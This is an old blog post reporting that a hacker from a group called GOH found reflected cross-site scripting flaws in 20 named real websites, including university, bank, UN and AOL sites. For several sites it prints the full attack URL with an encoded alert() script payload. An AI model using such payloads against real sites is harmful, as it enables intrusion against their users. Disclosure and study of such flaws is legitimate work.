Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Home Others XSS vulnerability found in 20 High profile sites by GOH group

XSS vulnerability found in 20 High profile sites by GOH group

Wednesday, April 25, 2012


An Indian ethical hacker named Akshay AKA 0z0n3 beloging to the hacking crew called GOH (godofhackers) has found 20 high profiled sites vulnerable to non-persistant xss attacks.


The list of Vulnerable site with their Screenshots:

1. nyu.edu - vunl link - http://www.nyu.edu/search.html?search=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i49.tinypic.com/33v2hkz.png

2. barclays.co.uk - snap - http://i46.tinypic.com/wrhlp4.png status - patched

3. pakistanstockexchange.com - vunl link - http://pakstockexchange.com/stock2/index_new.php?section=research&page=company_chooser_new&keyword=\%27;alert%28String.fromCharCode%2888,83,83%29%29//\\\%27;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//\\\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E\%22%3E\%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E snap - http://i49.tinypic.com/16huvi9.png

4. lilwaynehq.com- official site of lil wayne - vunl link - http://www.lilwaynehq.com/?s=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%20by%200z0n3%20of%20.::[GOH]::.%22%29%3C%2FSCRIPT%3E%22%3E snap - http://i50.tinypic.com/zugubs.png

5.mercury-pc.com - vunl link - http://www.mercury-pc.com/search.php snap - http://i48.tinypic.com/b624qa.png

6.transcend.com - vunl link - http://www.transcend-info.com/Support/Search/index.asp snap - http://i47.tinypic.com/28letjc.png

7.bangladeshtradeinfo.com - vunl link - http://www.bdtradeinfo.com//yellowpages/search.asp?search=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22%3E snap - http://i49.tinypic.com/dzc68.png

8.defense.aol.com - vunllink - http://defense.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E snap - http://i49.tinypic.com/6fpgeq.png

9.gov.aol.com - vunllink - http://gov.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E snap - http://i47.tinypic.com/f0n59x.png

10.http://www.unicc.org/ - http://i39.tinypic.com/352iycw.png

11.http://www.un.org.au - http://i44.tinypic.com/critx.jpg

12.http://unfccc.int - http://i40.tinypic.com/e0qrdf.png

13.http://search2.unaids.org - http://i43.tinypic.com/4gruww.png

14.http://unu.edu - http://i39.tinypic.com/v8odw9.png

15.http://www.unpri.org - http://i41.tinypic.com/20pegsj.png

16.http://www.uneval.org - http://i50.tinypic.com/2w3t2lz.png

17. http://www.unscn.org - http://i49.tinypic.com/11ugo76.jpg

18.http://www.undg.org - http://i45.tinypic.com/2zp2s6v.png

19.http://www.alienwarearena.com/ - http://i47.tinypic.com/vzbwif.png

20.www.games.com - aolsubdomain - http://i47.tinypic.com/33z9v8m.png
Share it: